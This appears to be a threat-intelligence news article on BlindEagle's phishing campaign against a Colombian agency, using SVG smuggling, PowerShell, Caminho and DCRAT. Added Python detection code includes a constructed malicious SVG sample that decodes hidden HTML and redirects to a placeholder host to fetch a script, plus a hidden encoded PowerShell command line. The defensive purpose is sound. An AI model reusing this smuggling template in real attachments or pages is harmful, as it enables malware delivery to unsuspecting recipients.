BlindEagle uses compromised government inboxes to bypass email security
Farah Amod
January 6, 2026
The campaign relied on internal trust and multi-stage malware delivery to reach targets in Colombia.
What happened
According to Cyber Press, a spear phishing campaign attributed to the BlindEagle threat actor began in early September 2025 and targeted a Colombian government agency under the Ministry of Commerce, Industry, and Tourism. The attackers sent the phishing emails from compromised internal accounts, so the messages passed Microsoft 365 sender authentication checks (SPF, DKIM, and DMARC validate the sending domain, not the sender's intent) and appeared legitimate to recipients.
Going deeper
The phishing message posed as an official legal notice about a labor lawsuit and prompted the recipient to acknowledge receipt. The attached SVG file decoded a Base64-embedded HTML page that imitated the Colombian judicial branch website. That page triggered the download of a JavaScript file, which launched a multi-stage chain of nested JavaScript and PowerShell. Investigators said the scripts were heavily obfuscated and executed fileless commands through Windows Management Instrumentation (WMI). The chain ultimately retrieved an image from the Internet Archive that concealed a Base64 payload. That payload loaded a .NET downloader known as Caminho, which fetched a further encoded file from Discord and injected a remote access trojan into MSBuild.exe using process hollowing, so the malicious code ran under the name of a signed Microsoft build tool.
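The chain above (script host, then PowerShell, then a hollowed MSBuild.exe reaching out to Discord) leaves a recognizable parent-child trail in endpoint telemetry. The following is an added example, not code from the Cyber Press report or from the article: it runs three hunting rules over constructed Sysmon-style process-creation and network-connection records. The field names, file paths, the allowlist of legitimate MSBuild parents, and the encoded command are assumptions for the example.

```python
"""Hunt process telemetry for the delivery chain described above:
script host -> PowerShell -> MSBuild.exe hollowed and talking to Discord."""
from typing import Dict, List, Tuple

# Constructed sample events shaped like Sysmon process-creation (id 1) and
# network-connection (id 3) records. Field names, paths and the encoded
# command are assumptions for this example, not data from the campaign.
EVENTS: List[Dict] = [
    {"id": 1, "pid": 4001, "ppid": 3002, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\ana\Downloads\notificacion.js"'},
    {"id": 1, "pid": 4010, "ppid": 4001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc <base64 omitted>"},
    {"id": 1, "pid": 4020, "ppid": 4010,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "MSBuild.exe"},
    {"id": 3, "pid": 4020, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "dest_host": "cdn.discordapp.com", "dest_port": 443},
    # A legitimate build started from Visual Studio should not alert.
    {"id": 1, "pid": 5001, "ppid": 5000,
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "MSBuild.exe App.sln"},
]

# Assumed allowlist of parents that legitimately start MSBuild; tune per fleet.
BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
# Interpreters and the WMI provider host that should not sit above MSBuild.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "wmiprvse.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule, detail) alerts for MSBuild.exe processes that look hollowed."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}

    def ancestry(pid: int) -> List[str]:
        """Walk ppid links upward, returning image basenames from the process itself."""
        chain, seen = [], set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            chain.append(basename(procs[pid]["image"]))
            pid = procs[pid]["ppid"]
        return chain

    alerts = []
    for e in events:
        if basename(e["image"]) != "msbuild.exe":
            continue
        if e["id"] == 1:
            parent = basename(e["parent_image"])
            if parent not in BUILD_PARENTS:
                alerts.append((e["pid"], "msbuild_unexpected_parent", parent))
            hosts = [a for a in ancestry(e["pid"])[1:] if a in SCRIPT_HOSTS]
            if hosts:
                alerts.append((e["pid"], "msbuild_script_host_ancestry", " <- ".join(hosts)))
        elif e["id"] == 3:
            # MSBuild normally only reaches package feeds; flag every connection
            # and allowlist known feeds when tuning.
            alerts.append((e["pid"], "msbuild_network_connection",
                           f'{e["dest_host"]}:{e["dest_port"]}'))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in hunt(EVENTS):
        print(f"pid {pid}: {rule} ({detail})")
```

The ancestry rule is the one that survives renaming or an extra hop: even if the loader inserts cmd.exe or WMI between PowerShell and MSBuild, a script host still appears somewhere above a build tool that the user never started.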
What was said
Researchers said the final payload was a customized variant of DCRAT that supported keylogging, file access, and persistence through scheduled tasks or registry changes. They observed AES-256 encryption and certificate-based command-and-control authentication, which is less common in commodity tooling. The activity was linked to BlindEagle with medium confidence based on infrastructure reuse, Dynamic DNS services, Portuguese-language artifacts in the loader, and the group's long-standing focus on Colombian organizations.
In the know
BlindEagle, also tracked as APT-C-36, is a long-running threat group that has been active since at least 2018 and is known for targeting organizations across Colombia and the wider Latin American region. Security teams have consistently linked the group to campaigns against government agencies, financial institutions, and critical infrastructure, where access to internal systems can support both espionage and financially motivated activity.
The group is best known for its heavy reliance on social engineering and phishing rather than novel malware. BlindEagle commonly uses malicious attachments and documents that appear trustworthy to gain initial access, then deploys widely available remote access tools such as Remcos and DCRAT. Researchers have noted that the group regularly adapts its delivery methods, using obfuscation, fileless execution, and abuse of legitimate services such as file-hosting and chat platforms to blend into normal enterprise traffic and prolong access once an inbox or endpoint is compromised.
FAQs
Why do attackers use compromised internal email accounts?
Messages sent from a legitimate account inside the organization originate from the real domain and mail servers, so SPF, DKIM, and DMARC pass and impersonation and sender-reputation filters have nothing to flag. The recipient also recognizes the sender, which makes the lure far more convincing than an external message would be.
What part did the SVG attachment play?
The SVG acted as a container for encoded content that decoded into a fake web page, which then initiated the malware download sequence.
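Because SVG is XML, a mail gateway can inspect it rather than treat it as an opaque image. The following is an added example, not code from the article or from the Cyber Press analysis, showing the kind of triage that catches the smuggling step described in "Going deeper" and in this answer: it parses an attachment, counts script elements, auto-firing event handlers, embedded XHTML and external links, and decodes long Base64 runs to see whether an HTML page is hiding inside. The two sample files, the lure text, and the example.invalid URL are constructed for the example.

```python
"""Triage an SVG attachment for HTML/script smuggling of the kind described above."""
import base64
import re
import xml.etree.ElementTree as ET

XHTML_NS = "{http://www.w3.org/1999/xhtml}"
EVENT_ATTRS = {"onload", "onclick", "onerror", "onmouseover", "onbegin", "onend"}
# Runs of Base64 alphabet long enough to hold a page rather than an icon path.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed samples: a plain icon, and an SVG whose <script> decodes an
# embedded Base64 HTML lure when the image loads. The lure text and the
# example.invalid URL are invented for this example.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">'
              b'<circle cx="8" cy="8" r="6" fill="#09f"/></svg>')
_LURE = (b"<html><body><h1>Notificacion judicial</h1>"
         b"<script>location='http://example.invalid/n.js'</script></body></html>")
SMUGGLING_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="run()"><script><![CDATA['
                 b'function run(){document.write(atob("' + base64.b64encode(_LURE) + b'"));}'
                 b']]></script></svg>')


def triage_svg(data: bytes) -> dict:
    """Collect smuggling indicators: script elements, event handlers, embedded
    XHTML, external/data/javascript hrefs, and Base64 blobs that decode to HTML."""
    f = {"script": 0, "event_handlers": [], "foreign_object": 0,
         "external_refs": [], "decoded_html": []}
    root = ET.fromstring(data)
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()       # drop the namespace prefix
        if tag == "script":
            f["script"] += 1
        if tag == "foreignobject" or el.tag.startswith(XHTML_NS):
            f["foreign_object"] += 1
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()    # also matches xlink:href
            if name in EVENT_ATTRS:
                f["event_handlers"].append(name)
            elif name == "href" and re.match(r"(https?|data|javascript):", value, re.I):
                f["external_refs"].append(value)
    # Decode long Base64 runs in the raw bytes, so a lure hidden in an
    # attribute or a CDATA block is found regardless of where it sits.
    for blob in B64_RE.findall(data):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:          # binascii.Error is a ValueError
            continue
        if re.search(rb"<\s*(html|body|script|iframe)\b", decoded, re.I):
            f["decoded_html"].append(decoded[:60].decode("latin-1"))
    return f


def verdict(f: dict) -> str:
    """Policy: decoded HTML, or script plus an auto-firing handler, is a block;
    any other active content is quarantined for analyst review."""
    if f["decoded_html"] or (f["script"] and f["event_handlers"]):
        return "block"
    if f["script"] or f["foreign_object"] or f["external_refs"]:
        return "quarantine"
    return "allow"


if __name__ == "__main__":
    for label, svg in (("benign", BENIGN_SVG), ("smuggling", SMUGGLING_SVG)):
        print(label, verdict(triage_svg(svg)), triage_svg(svg)["decoded_html"])
```

A real gateway would also reject attachments that fail to parse as XML and would treat nested or double-encoded Base64 the same way; the point is that an SVG with any script, handler, or embedded HTML has no business arriving as a "legal notice" and can be blocked on structure alone, without a signature for the specific lure.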
Why hide malware inside image files?
Hiding a Base64 payload inside an image hosted on a legitimate service lets the download look like ordinary web traffic and defeats signature-based detection, because the file on the wire is a valid image and the malicious content only exists after the loader extracts and decodes it in memory.
What makes DCRAT a persistent threat?
DCRAT supports multiple persistence methods and allows attackers to monitor activity, steal data, and maintain access over time.
How can organizations reduce risk from similar campaigns?
They can reduce the chance of internal account compromise with phishing-resistant multi-factor authentication and conditional access, monitor for anomalous mailbox behavior such as new forwarding rules or unusual sending patterns, block or detonate script-capable attachments such as SVG, JavaScript, and HTML files, alert when script hosts or PowerShell spawn build tools such as MSBuild.exe, and train staff to verify unexpected requests even when they come from an internal address.